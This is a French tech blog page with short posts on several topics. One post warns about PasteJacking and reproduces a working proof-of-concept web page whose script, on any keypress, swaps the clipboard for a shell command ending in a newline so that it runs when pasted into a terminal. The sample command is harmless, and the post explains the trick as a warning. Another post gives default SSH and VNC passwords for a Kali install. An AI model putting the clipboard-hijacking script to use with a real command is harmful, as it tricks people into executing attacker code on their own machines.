Entrez vos identifiants

x
OU
Vous avez oublié votre mot de passe ?
Utilisateur wiki : vous n'aviez pas d'email ?

Korben - Site d'actualité geek et tech

Go Top

Edito du 18/05/2016

Hello tout le monde,

je suis de retour du Var avec des tas d'idées, des trucs à raconter et des bons souvenirs plein la tête. Ce FPV AirShow était exceptionnel. Je me grouille de rédiger un truc qui déchire pour que vous sachiez tout sur cet événement et sur les drones de course.

Mais en attendant, retour à la réalité avec une boite mail en carafe qu'il faut que je répare (j'ai atteins mes 50 Go de stockage alors je vide petit à petit) et quelques milliers de news à dépiler dans Feedly.

Donc je cravache et tout devrait rentrer dans l'ordre rapidement ;-)

Passez une excellente fin de semaine.

K.

Attention au PasteJacking (et merci de ne pas copier coller cet article)

0

wallhaven-321038

La technique n'est pas nouvelle et j'ai déjà abordé le problème en 2015. En gros, il est possible avec un simple bout de javascript, de mettre autre chose dans le presse-papier de l'ordinateur en cas de copier coller.

Cela peut poser de nombreux soucis notamment sur les sites qui donnent des lignes de commande que les gens copient et collent machinalement. J'ai déjà mis en garde sur le sujet donc je ne reviendrai pas dessus (aller lire l'article linké ci-dessus). Par contre, pour ceux qui veulent comprendre comment ça fonctionne, sachez qu'un bout de code baptisé PasteJacking est disponible sur Github.

Voici le code en question :

<html>
<body>
Copy the text below and run it in your terminal for totally not evil things to happen.
</br>

<p>echo "not evil"</p>
<script>
function copyTextToClipboard(text) {
var textArea = document.createElement("textarea");

//
// *** This styling is an extra step which is likely not required. ***
//
// Why is it here? To ensure:
// 1. the element is able to have focus and selection.
// 2. if element was to flash render it has minimal visual impact.
// 3. less flakyness with selection and copying which **might** occur if
// the textarea element is not visible.
//
// The likelihood is the element won't even render, not even a flash,
// so some of these are just precautions. However in IE the element
// is visible whilst the popup box asking the user for permission for
// the web page to copy to the clipboard.
//

// Place in top-left corner of screen regardless of scroll position.
textArea.style.position = 'fixed';
textArea.style.top = 0;
textArea.style.left = 0;

// Ensure it has a small width and height. Setting to 1px / 1em
// doesn't work as this gives a negative w/h on some browsers.
textArea.style.width = '2em';
textArea.style.height = '2em';

// We don't need padding, reducing the size if it does flash render.
textArea.style.padding = 0;

// Clean up any borders.
textArea.style.border = 'none';
textArea.style.outline = 'none';
textArea.style.boxShadow = 'none';

// Avoid flash of white box if rendered for any reason.
textArea.style.background = 'transparent';
textArea.value = text;

document.body.appendChild(textArea);

textArea.select();

try {
var successful = document.execCommand('copy');
var msg = successful ? 'successful' : 'unsuccessful';
console.log('Copying text command was ' + msg);
} catch (err) {
console.log('Oops, unable to copy');
}

document.body.removeChild(textArea);
}

document.addEventListener('keydown', function(event) {
var ms = 800;
var start = new Date().getTime();
var end = start;
while(end < start + ms) {
end = new Date().getTime();
}
copyTextToClipboard('echo "evil"\n');
});

</script>
</body>

</html>

Pour que ça fonctionne, il faut que la victime fasse un CTRL+C (ou CMD + C sous OSX). Si elle fait un clic droit "copier", ça ne fonctionnera pas.

Vous avez aimé cet article ? Alors partagez-le avec vos amis en cliquant sur les boutons ci-dessous :

Twitter Facebook Google Plus Linkedin email Flattr ! Bitcoin DogeCoin

RSyncOSX – Une interface graphique OSX pour RSync

0

wallhaven-380683

Si vous êtes sous Mac et que vous voulez sauvegarder et synchroniser des données entre vos ordinateurs ou avec un serveur distant, une bonne solution est d'utiliser le logiciel libre Rsync.

Mais tout le monde n'est pas à l'aise en ligne de commande. C'est pourquoi Thomas Evensen a créé RsyncOSX qui est ni plus ni moins qu'une interface graphique (GUI) pour RSync.

Il permet donc de faire des sauvegardes incrémentales (ou non d'ailleurs) et des restaurations, soit localement (disque USB par exemple), soit vers des serveurs distants (votre NAS, un serveur web à l'autre bout du monde...etc.). Bref tout pareil qu'avec RSync mais en mode clickodrome.

estimating_Maxfilesize

execute2

À garder dans votre boite à outils.

Sinon, dans le même genre, j'utilise AASync qui fait grosso modo la même chose (via SFTP) sauf qu'il est payant.

Vous avez aimé cet article ? Alors partagez-le avec vos amis en cliquant sur les boutons ci-dessous :

Twitter Facebook Google Plus Linkedin email Flattr ! Bitcoin DogeCoin

Pentest de centrale électrique

0

Pentest de centrale électrique

Une société énergétique qui approvisionne en électricité une partie de la région du Midwest aux États unis a embauché une équipe de pentesteurs pour tester son système de sécurité.

Durant 3 jours, ils ont tout mis en oeuvre pour s'introduire dans les bâtiments de la société et pirater son réseau pour prendre la main sur le système informatique.

C'est très impressionnant et très instructif !

Merci à Simon pour le partage

Vous avez aimé cet article ? Alors partagez-le avec vos amis en cliquant sur les boutons ci-dessous :

Twitter Facebook Google Plus Linkedin email Flattr ! Bitcoin DogeCoin

Fast.com – Outil de mesure ou moyen de pression ?

0

fastcom

Voici un outil de plus pour mesurer le débit de votre connexion internet. Proposé par Netflix, ce site sans pub et au look ultra minimaliste n'est pas outil de diagnostic.

En effet, Fast.com ne permet ni mesure de latence, ni ping, ni même le débit montant (upload). Non, c'est uniquement une mesure du débit descendant (download) entre votre ordinateur et les serveurs de Netflix qui est proposée. Pratique et simple à utiliser pour les Internautes non techniques et probablement un bon moyen de "négocier" avec certains FAI.

Screenshot 2016-05-23 09.57.21

En effet, il semblerait que Netflix ait quelques soucis concernant ses débits, dus à des accords de peering qui tarderaient à venir avec certains fournisseurs d'accès en France et ailleurs dans le monde.

Je suppose donc (mais ce n'est que mon avis) que Netflix souhaite avec cet outil, faire pression sur ces FAI au travers de leurs abonnés, pour que le débit vers son site s'améliore. On peut d'ailleurs lire ceci dans leur FAQ :

Pourquoi Netflix propose-t-il Fast.com ?

Nous souhaitons que nos utilisateurs puissent évaluer la vitesse fournie par leur FAI de façon simple et rapide, sans publicité.

Que faire si la vitesse n'est pas celle pour laquelle je paie ?

Si les résultats obtenus via l'outil Fast.com et d'autres tests indiquent souvent que la vitesse est inférieure à celle pour laquelle vous payez, vous pouvez parler de ces résultats à votre FAI.

Après c'est aussi possible qu'ils s'en servent pour collecter de la donnée (sur les débits) mais comme ils le font déjà via leur site, je ne vois pas vraiment ce que ça va apporter de plus.

Hmm... On verra ce que ça donne. En attendant, ça nous fait un outil de mesure supplémentaire à bookmarker.

Vous avez aimé cet article ? Alors partagez-le avec vos amis en cliquant sur les boutons ci-dessous :

Twitter Facebook Google Plus Linkedin email Flattr ! Bitcoin DogeCoin

Tuto

Comment installer Linux sur Android

Pour installer Linux sur un téléphone Android sans dire adieu à une utilisation normale de son appareil, il existe une solution sans risque baptisée Linux Deploy. Ce logiciel disponible sur le PlayStore permet de récupérer une distrib Debian, Ubuntu, Arch Linux, Fedora, Kali...etc et de la monter dans un environnement chroot.

Screenshot_2013-09-03-18-05-22

Cela permet de faire cohabiter une version de Linux avec votre Android. La distrib Linux ne sera pas directement utilisable depuis le téléphone, avec l'interface desktop, un clavier et une souris sauf si vous passez par VNC (en local ou distant depuis votre ordinateur) ou via SSH (pour la ligne de commande).

Pour mon test, j'ai installé Kali Linux, que vous connaissiez peut être avant sous le nom de Backtrack est une distrib dédiée à la sécurité informatique et au pentest.

En allant sur le site de Kali Linux, vous pouvez si vous le désirez récupérer une ISO que vous pourrez booter sur votre ordinateur, votre Chromebook, votre Galaxy Note ou encore votre Raspberry Pi... Mais si vous avez un téléphone Android en rab'  sachez qu'il est aussi possible d'installer Kali Linux dessus grâce à Linux Deploy.

Pour cela, il vous faut un téléphone capable de faire tourner Android 2.1 au minimum, 5 GB d'espace libre, une connexion wifi et un peu de temps...

Lancez Linux Deploy sur votre téléphone puis sélectionnez Kali Linux dans l'onglet "Distribution" puis appuyez sur le bouton "Install". Kali va alors se télécharger et s'installer.

Screenshot_2013-09-03-18-05-08

Pensez à changer le chemin d'installation si vous voulez installer ça ailleurs (carte SD...Etc). Linux Deploy montera et chargera l'image de Kali et démarrera les services SSH, VNC...etc afin que vous puissiez vous connecter à distance depuis un ordinateur sur votre téléphone afin d'utiliser cette distrib.

Pour info, le mot de passe VNC est "changeme" et pour SSH, le login est "android" et le mot de passe "changeme".

Enfin, rassurez-vous, encore une fois, tout est réversible. Les environnements sont juste montés en chroot par Linux Deploy et cohabiteront avec votre Android.

Merci à Mouad pour le partage !

Plus de tutos dans le stream Linux

Posté par Korben

Une ambiance nature dans votre téléphone ou votre navigateur pour vous relaxer

0

wallhaven-93964

Vous vous rappelez de Noizio sous OSX qui permet de se détendre en écoutant et combinant des sons de la nature ?

Et bien voici Noisli, qui fait la même chose sous iOS, Android et Chrome. Noisli permet de combiner des sons comme la pluie, le feu, le vent, le chant des oiseaux, et de vous les jouer sur une durée de votre choix.

Vous pouvez aussi enregistrer vos mix pour les rejouer plus tard et pour ceux qui son chez Free Mobile, vous pouvez lire toutes ces merveilleuses ambiances sonores offline.

noisli1 noisli2

Génial si vous voulez méditer un peu ou décompresser en fermant les yeux dans les transports. Attention quand même au bruit de la pluie qui peut provoquer une envie pressante ;-)).

a voir ici.

PS : Les trolls c'est bon, mangez-en !

Vous avez aimé cet article ? Alors partagez-le avec vos amis en cliquant sur les boutons ci-dessous :

Twitter Facebook Google Plus Linkedin email Flattr ! Bitcoin DogeCoin

Ransomware TeslaCrypt – Le déchiffrement est enfin possible

0

happy

La société ESET ayant remarqué que le ransomware TeslaCrypt était en fin de vie, ils se sont connectés sur le chat du site de paiement de TeslaCrypt pour demander avec culot aux cybercriminels, la clé universelle (master key) de déchiffrement du malware.

Et c'est avec surprise que ces derniers ont accepté de la donner à ESET, mais aussi de la poster sur leur site (aujourd'hui disparu). C'est une excellente nouvelle. Cela veut dire que si vous avez été frappé par TeslaCrypt et que vous avez conservé votre disque avec les données chiffrées, vous pouvez à nouveau y avoir accès.

Pour cela, il suffit de télécharger cet utilitaire mis en ligne par ESET qui vous permettra de déchiffrer vos fichiers victimes des versions 3.0 à 4.2 de TeslaCrypt.

ESET TeslaCrypt decryptor in action

Comme quoi, c'est toujours utile de garder une copie de ses fichiers chiffrés, on ne sait jamais. Si vous êtes curieux au sujet des ransomwares, je vous invite à lire ces articles et si vous êtes victime d'une de ces saloperies, mais que vous ne savez pas laquelle, allez lire celui-ci.

Source

Vous avez aimé cet article ? Alors partagez-le avec vos amis en cliquant sur les boutons ci-dessous :

Twitter Facebook Google Plus Linkedin email Flattr ! Bitcoin DogeCoin

  • Rejoignez les 57272 bidouilleurs de la grande famille des Korbenautes
    «Je considère que votre email est aussi important que le mien.»
    Korben
  • DANS TON CHAT (BASHFR)

    Alexandre: c quoi ce 2 ds tes crochet ?
    ChaЯly32[J-24][2]: le nombre de cons qui ont demandés "ya quoi dans 24 jours"
    * ChaЯly32[J-24][2] is now known as ChaЯly32[J-24][2][1]

    -- http://danstonchat.com/7922.html
  •  
  • RSS Emplois sécurité

  • Site hébergé par
    Agarik Sponsor Korben
  • RSS Offres d’emploi

  •  
  • C’est le moment de chiffrer

    votre téléphone Android

    J'ai remarqué autour de moi que peu de personnes pensaient à chiffrer leur téléphone ou leur tablette Android. Pourtant, ça me semble être la règle de base quand on désire protéger un minimum ses données. Si vous perdez votre téléphone, il est assez simple d'en récupérer les données...lire la suite

    Glowbl – Pour diffuser et engager

    une conversation autour

    d’un même contenu

    J'aime bien les outils collaboratifs en ligne. Je trouve ça toujours autant "magique" de voir que d'autres bossent en même temps que nous...lire la suite

    En ce moment dans l'univers "Raspberry Pi"

    Voir tous les articles »